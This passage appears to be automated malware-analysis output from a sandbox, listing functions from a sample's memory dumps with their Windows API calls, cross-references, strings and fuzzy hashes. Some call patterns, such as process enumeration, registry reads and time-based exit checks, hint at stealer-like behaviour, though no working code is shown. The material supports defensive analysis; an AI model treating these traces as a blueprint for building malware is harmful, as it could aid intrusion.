StrCmpCA.SHLWAPI(?,00638C1C), ref: 009E7AAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E7AE7
lstrcpy.KERNEL32(00000000,?), ref: 009E7B44

Part of subcall function 009F74A7: lstrcpy.KERNEL32(00000000), ref: 009F74C1

Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D169E
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D1746

Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E5E7C
Part of subcall function 009E5E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 009E5EAB
Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 009E5EDC
Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F04
Part of subcall function 009E5E47: lstrcat.KERNEL32(00000000,00000000), ref: 009E5F0F
Part of subcall function 009E5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 009E5F37

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$FolderPathlstrcat
String ID:
API String ID: 2938889746-0
Opcode ID: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
Instruction ID: d02b436869ca7518209c812798d22b29a31b0244c33fa4fad0b1122a71d33792
Opcode Fuzzy Hash: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
Instruction Fuzzy Hash: 20F16F71E042458FCB25DF69C844A69B7B5AF88324F29C1ADD8089B3A2D731ED42CF91

Function 009E7A84 Relevance: 7.9, APIs: 5, Instructions: 365stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00638AAC), ref: 009E79D7
StrCmpCA.SHLWAPI(?,00638C1C), ref: 009E7AAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 009E7AE7
lstrcpy.KERNEL32(00000000,?), ref: 009E7B44
StrCmpCA.SHLWAPI(?,00638D84), ref: 009E7DE4

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
Instruction ID: 7758c588e595d990f23fb02188d4c0b189d497b58f12b47725a6d0d7b3255127
Opcode Fuzzy Hash: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
Instruction Fuzzy Hash: 4CF15F71E042458FDB25DF69C844A69B7B5AF88324F29C1ADD8089B3A2D731ED42CF91

Function 009E7D47 Relevance: 7.9, APIs: 5, Instructions: 363COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00638AAC), ref: 009E79D7
StrCmpCA.SHLWAPI(?,00638D84), ref: 009E7DE4

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14cdd88b83ea7d92af237cb005bbb417a3c6d180c2d1a0adcc72aab46658f625
Instruction ID: 2f1b07c20eb7e073b5f836d9ee30ef39c780ffc55b1599721abf0041b56efd41
Opcode Fuzzy Hash: 14cdd88b83ea7d92af237cb005bbb417a3c6d180c2d1a0adcc72aab46658f625
Instruction Fuzzy Hash: A6E16F71E042458FDB25DF69C844B69B7B5AF88324F29C1ADD8089B3A2D731ED42CF91

Function 009F965F Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32 ref: 009F9697
GetCPInfo.KERNEL32(?,?), ref: 009F96AA
memset.MSVCRT ref: 009F96C2
setSBUpLow.LIBCMT ref: 009F9798

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValidmemset
String ID:
API String ID: 703783727-0
Opcode ID: 6eab46f699b87600043b982b3256ab625c67c80558f36cc1ccd8bbca43d4f8ed
Instruction ID: ab7f688f9b78ede952fe23e5aff5d281ba32cd494abaa6e2031f8243f4be7d27
Opcode Fuzzy Hash: 6eab46f699b87600043b982b3256ab625c67c80558f36cc1ccd8bbca43d4f8ed
Instruction Fuzzy Hash: EF313A30A183894FD725AF75C88437ABF949F42314F1845AEEB92DF192C329C805D791

Function 00421B00 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00421E28), ref: 00421B52

Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
Part of subcall function 00421800: lstrlenA.KERNEL32(00A543A8,00000000,00000000,?,?,00421B61), ref: 00421840
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
Part of subcall function 00421800: lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F

sscanf.NTDLL ref: 00421B7A
SystemTimeToFileTime.KERNEL32(?,?), ref: 00421B96
SystemTimeToFileTime.KERNEL32(?,?), ref: 00421BA6
ExitProcess.KERNEL32 ref: 00421BC3

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
String ID:
API String ID: 3040284667-0
Opcode ID: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
Instruction ID: 74431add482d266e5f481d4c3f26529432deb7ac332c40e3c7ddf6828a7bb522
Opcode Fuzzy Hash: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
Instruction Fuzzy Hash: BD2102B1508301AF8344EF69D88485BBBF9EFD8304F409A1EF5A9C3220E774E5048FA6

Function 009F1D67 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 009F1DB9

Part of subcall function 009F1A67: lstrcpy.KERNEL32(00000000,0042D01C), ref: 009F1A96
Part of subcall function 009F1A67: lstrlen.KERNEL32(00638DEC), ref: 009F1AA7
Part of subcall function 009F1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 009F1ACE
Part of subcall function 009F1A67: lstrcat.KERNEL32(00000000,00000000), ref: 009F1AD9
Part of subcall function 009F1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 009F1B08
Part of subcall function 009F1A67: lstrlen.KERNEL32(00435564), ref: 009F1B1A
Part of subcall function 009F1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 009F1B3B
Part of subcall function 009F1A67: lstrcat.KERNEL32(00000000,00435564), ref: 009F1B47
Part of subcall function 009F1A67: lstrcpy.KERNEL32(00000000,00000000), ref: 009F1B76

sscanf.NTDLL ref: 009F1DE1
SystemTimeToFileTime.KERNEL32(?,?), ref: 009F1DFD
SystemTimeToFileTime.KERNEL32(?,?), ref: 009F1E0D
ExitProcess.KERNEL32 ref: 009F1E2A

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
String ID:
API String ID: 3040284667-0
Opcode ID: 0a1ad68ea18747a319e8a45fd1f50d4604905386d8ae97549ccd0aa624e14989
Instruction ID: 574c77ab99812114c287093720c5e36805413abb0f5eb771472cb30fdc9ca811
Opcode Fuzzy Hash: 0a1ad68ea18747a319e8a45fd1f50d4604905386d8ae97549ccd0aa624e14989
Instruction Fuzzy Hash: 7221E2B1518301AF8344DF69D8859ABBBF9EED8314F409A1EF599C3220E770D6048FA6

Function 00406E30 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 00406E40
memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
HeapAlloc.KERNEL32(00000000), ref: 00406EBB

Strings

@, xrefs: 00406E30

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocProcess
String ID: @
API String ID: 1643994569-2766056989
Opcode ID: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
Instruction ID: b28c2e2eafd009aece7dfa75dd6d3a6e0d6a1e6899dabcaa8fc792e54f3dbcc7
Opcode Fuzzy Hash: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
Instruction Fuzzy Hash: 9C1161706007129BEB258B61DC84BB773E4EB40701F454439EA47DB684FFB8D950CB99

Function 009D1267 Relevance: 7.5, APIs: 5, Instructions: 37registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 009D127C
RtlAllocateHeap.NTDLL(00000000), ref: 009D1283
RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 009D12A0
RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 009D12BA
RegCloseKey.ADVAPI32(?), ref: 009D12C4

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction ID: d38f4bf7ad744d1dcac99df0c80df4a1e63714bf508aafac83d4ab88fad08206
Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction Fuzzy Hash: F5F09075A40308BFD7049BE09C4DFEB7B7DEB04755F100059BE05E2280D7B05A048BE0

Function 009F9268 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 009F9274

Part of subcall function 009F8A96: __getptd_noexit.LIBCMT ref: 009F8A99
Part of subcall function 009F8A96: __amsg_exit.LIBCMT ref: 009F8AA6

__getptd.LIBCMT ref: 009F928B
__amsg_exit.LIBCMT ref: 009F9299
__lock.LIBCMT ref: 009F92A9
__updatetlocinfoEx_nolock.LIBCMT ref: 009F92BD

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
Instruction ID: 6a8f97b69abef1c86ae9b7bf825c55ead6a0b5d413617da9a09ff56afa78f29c
Opcode Fuzzy Hash: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
Instruction Fuzzy Hash: 21F0B43290870CAFDB61BBB89803BBE73A0AF40720F11050AF725671C2DB649A40DB59

Function 00423E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124stringtimeCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
lstrcpy.KERNEL32(00000000,00A796F0), ref: 00423E6F
GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79

Strings

*M@, xrefs: 00423EEE, 00423EDD

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$SystemTime
String ID: *M@
API String ID: 684065273-4186991356
Opcode ID: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
Instruction ID: b70439790c50c5c6328432dc7e4028cf2044113f60d486d5e56dbf02b5324992
Opcode Fuzzy Hash: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
Instruction Fuzzy Hash: 76418D31E012158FDB14CF29E984666BBF5FF08315B4A80AAE845DB3A2C779DD42CF94

Function 00417CA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00417D14
std::_Xinvalid_argument.LIBCPMT ref: 00417D2F
memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,004091B6,?,?,?,?,00000000,?,00001000,?), ref: 00417D84

Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DD8
Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417E11
Part of subcall function 00417DC0: memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74

Strings

string too long, xrefs: 00417D0F, 00417D2A

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
Instruction ID: cceaebfc163d96aa0f8494b9eac0357faa14b69c3768ea23588e1796d2ee1bc6
Opcode Fuzzy Hash: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
Instruction Fuzzy Hash: 0F31E5723086148BD7249E6CF880ABBF7F9EF91764B204A2BF14687741D775988183ED

Function 009EF247 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 009EF27A
StrCmpCA.SHLWAPI(?,ERROR), ref: 009EF295
lstrcpy.KERNEL32(00000000,ERROR), ref: 009EF2F6

Strings

ERROR, xrefs: 009EF28F, 009EF2F0

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: ERROR
API String ID: 3722407311-2861137601
Opcode ID: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
Instruction ID: ebdbe4cec75c553ba542849412aa652ba24121b3f23933bb61f8a7f38ada75b8
Opcode Fuzzy Hash: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
Instruction Fuzzy Hash: 6E212C706541865BCB24BF79CC56BA93BE4EF55308F008826F959DB742DB78DD00DB50

Function 00408740 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408767

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

Strings

yxxx, xrefs: 00408749
vector<T> too long, xrefs: 00408762
yxxx, xrefs: 00408771

Memory Dump Source

Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_DADE.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
String ID: vector<T> too long$yxxx$yxxx
API String ID: 2884196479-1517697755
Opcode ID: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
Instruction ID: e0d1b7fbc79543eee78ba1c3596c29abb19376f5ed5f905b3ee67b4588712001
Opcode Fuzzy Hash: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
Instruction Fuzzy Hash: 74F09027B100310BC314A43E9E8405FA94657E539037AD77AE986FF38DEC39EC8281D9

Function 009D8DB7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(009D7B55,009D8B44,03C3C3C3,00000401,009D7B55,?,00000000,?,009D7B55,80000001), ref: 009D8DD7
std::exception::exception.LIBCMT ref: 009D8DF2
__CxxThrowException@8.LIBCMT ref: 009D8E07

Strings

PC, xrefs: 009D8E00

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: PC
API String ID: 3448701045-2975848930
Opcode ID: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction ID: de941a38fb66db87dd5e8d62cfff041e24aca54e3785062ce86aa09ba3d95f78
Opcode Fuzzy Hash: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction Fuzzy Hash: 29F0A7B164060967EB18F7A4CD467BF7378EB00304F04852AD916D2281EBB4DA0586E6

Function 009EF077 Relevance: 6.3, APIs: 5, Instructions: 93stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EF0A6
lstrlen.KERNEL32(00000000), ref: 009EF0B4
lstrcpy.KERNEL32(00000000,00000000), ref: 009EF0DB
lstrlen.KERNEL32(00000000), ref: 009EF0E2
lstrcpy.KERNEL32(00000000,00435550), ref: 009EF116

Memory Dump Source

Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
Instruction ID: 3facaf35e174447281d3edbba32fa3111e89373d55e201c0b80f41ce73a6a313
Opcode Fuzzy Hash: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
Instruction Fuzzy Hash: 28318B71A446945BC722BF38DC86BAD7BA5EF91309F008433F8049B712DB68DC059B91

Function 009F3C57 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

Part of subcall function 009F7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 009F7495

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009F3C9D
Process32First.KERNEL32(00000000,00000128), ref: 009F3CB0
Process32Next.KERNEL32(00000000,00000128), ref: 009F3CC6

Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0

